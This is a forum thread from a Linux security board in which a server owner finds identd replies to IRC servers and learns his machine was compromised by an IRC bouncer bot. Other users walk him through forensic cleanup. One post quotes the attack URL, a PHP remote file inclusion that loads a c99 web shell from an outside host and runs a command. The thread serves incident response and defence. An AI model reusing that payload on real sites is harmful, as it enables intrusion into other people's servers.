Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
| Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
 |
04-07-2006, 07:03 PM
|
#1
|
|
LQ Newbie
Registered: Apr 2006
Posts: 6
Rep: 
|
whats is this
I am getting a bunch of this crap in my messages log. any body know what to make of it. Do I need to take action?
Thanks in advance
in.identd[21618]: reply to 62.231.74.10: 41501 , 6667 : USERID : OTHER :99
Apr 7 20:07:45 ns1 in.identd[21619]: reply to 193.110.95.1: 41502 , 7777 : USERID : OTHER :99
Apr 7 20:07:57 ns1 in.identd[21620]: reply to 195.197.175.21: 41507 , 7000 : USERID : OTHER :99
Apr 7 20:07:59 ns1 in.identd[21621]: reply to 161.53.178.240: 41508 , 6667 : USERID : OTHER :99
Apr 7 20:08:03 ns1 in.identd[21622]: reply to 69.16.172.34: 41510 , 7000 : USERID : OTHER :99
Apr 7 20:08:06 ns1 in.identd[21623]: reply to 195.47.220.2: 41511 , 6667 : USERID : OTHER :99
Apr 7 20:08:09 ns1 in.identd[21624]: reply to 195.144.12.5: 41512 , 7000 : USERID : OTHER :99
Apr 7 20:09:48 ns1 in.identd[21628]: reply to 195.197.175.21: 41518 , 7000 : USERID : OTHER :99
Apr 7 20:09:52 ns1 in.identd[21629]: reply to 194.109.20.90: 41520 , 6667 : USERID : OTHER :99
Apr 7 20:09:54 ns1 in.identd[21630]: reply to 194.134.7.194: 41521 , 6662 : USERID : OTHER :99
Apr 7 20:09:55 ns1 in.identd[21631]: reply to 194.134.7.195: 41522 , 6667 : USERID : OTHER :99
Apr 7 20:09:57 ns1 in.identd[21634]: reply to 62.231.74.10: 41523 , 6667 : USERID : OTHER :99
Apr 7 20:10:00 ns1 in.identd[21635]: reply to 193.110.95.1: 41524 , 7777 : USERID : OTHER :99
Apr 7 20:10:36 ns1 in.identd[21636]: reply to 195.197.175.21: 41527 , 6667 : USERID : OTHER :99
Apr 7 20:10:38 ns1 in.identd[21637]: reply to 195.197.175.21: 41528 , 7000 : USERID : OTHER :99
Apr 7 20:10:40 ns1 in.identd[21638]: reply to 161.53.178.240: 41529 , 6667 : USERID : OTHER :99
Apr 7 20:10:44 ns1 in.identd[21639]: reply to 69.16.172.34: 41531 , 7000 : USERID : OTHER :99
Apr 7 20:10:47 ns1 in.identd[21640]: reply to 195.47.220.2: 41532 , 6667 : USERID : OTHER :99
Apr 7 20:10:49 ns1 in.identd[21641]: reply to 195.144.12.5: 41533 , 7000 : USERID : OTHER :99
Apr 7 20:12:28 ns1 in.identd[21642]: reply to 195.197.175.21: 41537 , 7000 : USERID : OTHER :99
Apr 7 20:12:32 ns1 in.identd[21643]: reply to 194.109.20.90: 41539 , 6667 : USERID : OTHER :99
Apr 7 20:12:34 ns1 in.identd[21644]: reply to 194.134.7.194: 41540 , 6662 : USERID : OTHER :99
Apr 7 20:12:35 ns1 in.identd[21645]: reply to 194.134.7.195: 41541 , 6667 : USERID : OTHER :99
Apr 7 20:12:37 ns1 in.identd[21646]: reply to 62.231.74.10: 41542 , 6667 : USERID : OTHER :99
Apr 7 20:12:40 ns1 in.identd[21647]: reply to 193.110.95.1: 41543 , 7777 : USERID : OTHER :99
Apr 7 20:13:16 ns1 in.identd[21648]: reply to 195.144.12.5: 41546 , 6667 : USERID : OTHER :99
Apr 7 20:13:18 ns1 in.identd[21652]: reply to 195.197.175.21: 41547 , 7000 : USERID : OTHER :99
Apr 7 20:13:20 ns1 in.identd[21653]: reply to 161.53.178.240: 41548 , 6667 : USERID : OTHER :99
Apr 7 20:13:24 ns1 in.identd[21655]: reply to 69.16.172.34: 41550 , 7000 : USERID : OTHER :99
Apr 7 20:13:25 ns1 in.identd[21657]: reply to 195.47.220.2: 41551 , 6667 : USERID : OTHER :99
Apr 7 20:13:27 ns1 in.identd[21659]: reply to 195.144.12.5: 41552 , 7000 : USERID : OTHER :99
Apr 7 20:15:06 ns1 in.identd[21660]: reply to 195.197.175.21: 41556 , 7000 : USERID : OTHER :99
|
|
|
|
|
04-07-2006, 07:06 PM
|
#2
|
|
Member
Registered: Feb 2003
Location: Poole, Dorset, England
Distribution: Fedora Core 5
Posts: 80
Rep: 
|
No action is required for that, it is simply your IDENTD responding to IRC Servers/Users on request which is normal.
|
|
|
|
|
04-07-2006, 11:24 PM
|
#3
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
//Moderator note: Moving this post to it's own thread. In the future please start a new thread if your topic isn't directly related to the existing one. Thank you.
|
|
|
|
|
04-07-2006, 11:26 PM
|
#4
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Out of curiousity, should this system be running irc and identd in the first place?
|
|
|
|
|
04-07-2006, 11:37 PM
|
#5
|
|
LQ Newbie
Registered: Apr 2006
Posts: 6
Original Poster
Rep:
|
No
I thought I was just adding to the thread, I was following steps to stop SSH attacks and ran across that as well. And the answer is no I had no IRC service or users of those ip ranges. I found a shell script uploaded in the incoming pub some bot for Mecwars IRC. I did kill it. Thanks,
After digging in a bit I found that they had used some type of remote thread that may be a risk to others I should mention. It looked like this
[HTML]http://***.com/SQuery.keep/lib/armygame.php?libpath=http://***.com/image/.nd/c99last.txt?&cmd=id[/HTML]
It opens a shell script that launches the bot. I have no idea why they were bouncing though me other than to mask Ip’s I guess. I contacted the other domain about the mal ware and have got no reply. Nice little bugger though
Last edited by jshonk; 04-07-2006 at 11:49 PM.
|
|
|
|
|
04-08-2006, 12:08 AM
|
#6
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
After digging in a bit I found that they had used some type of remote thread that may be a risk to others I should mention. It looked like this
http://***.com/SQuery.keep/lib/armyg...st.txt?&cmd=id
It's likely this vulnerability. Not a zero-day, but certainly recent. It allows arbitrary code execution, so you'll need to perform a detailed forensic analysis to determine the extent of the compromise. If that's the only entry your seeing in your logs, then I'd be concerned about log deletion.
It opens a shell script that launches the bot.
Obviously look at ownership of any scripts or binaries. Where were these located, in /tmp or somewhere else?
I have no idea why they were bouncing though me other than to mask Ip’s I guess.
Sounds like the typical IRC bouncer, anything else of interest?
|
|
|
|
|
04-08-2006, 12:39 AM
|
#7
|
|
LQ Newbie
Registered: Apr 2006
Posts: 6
Original Poster
Rep:
|
Yep tmp
Quote:
|
Where were these located, in /tmp or somewhere else?
|
Yea /tmp and /usr/tmp
Quote:
|
Sounds like the typical IRC bouncer, anything else of interest?
|
Just the shell.php I found in the pub
Quote:
|
so you'll need to perform a detailed forensic analysis to determine the extent of the compromise. If that's the only entry your seeing in your logs, then I'd be concerned about log deletion.
|
Whats the best way to go about this? Any idea's |
|
|
|
|
04-08-2006, 01:20 AM
|
#8
|
|
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Rep:
|
Quote:
|
Originally Posted by jshonk
Whats the best way to go about this? Any idea's
|
There are several checklists available in the Security References thread put together by UnSpawn. You can find the thread at the top of the forum or via the link in my sig.
Start out by taking a listing of all network connections and process info (ps aux). If still see any suspicious processes or network daemons, you should take the system offline. Then thoroughly look through all of logs on the system with an eye out for any abnormal messages or errors, esp application errors or kernel panics/oops. Make sure to go through the http logs with a fine tooth comb and see if you can reconstruct what cmds were executed during the exploitation (i.e. in the url you posted the 'id' command was run). Look at login info (w/ last -i and lastb) for any suspicious login info.
You can get a listing of all the files that have been created by the web user that PHP was running under (usually this is 'nobody' or 'apache') using the command find / -user <web_user>. You should also get a listing of all the SUID/SGID root files on the system using find / -perm 2000 -o -perm 4000.
I'd also recommend installing/running chkrootkit and/or rkhunter on the system in order to identify signs of a rootkit as well as other commons signs of a compromise. |
|
|
|
|
04-08-2006, 08:25 AM
|
#9
|
|
LQ Newbie
Registered: Apr 2006
Posts: 6
Original Poster
Rep:
|
All good
Well looks all good now. The only thing I regret is having to reboot to make shore there were no scripts running again, I was up for 716 days and ironically it’s my birthday. Thanks man
|
|
|
|
All times are GMT -5. The time now is 08:23 AM.
|
|
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
|
 Latest Threads
LQ News
|
|
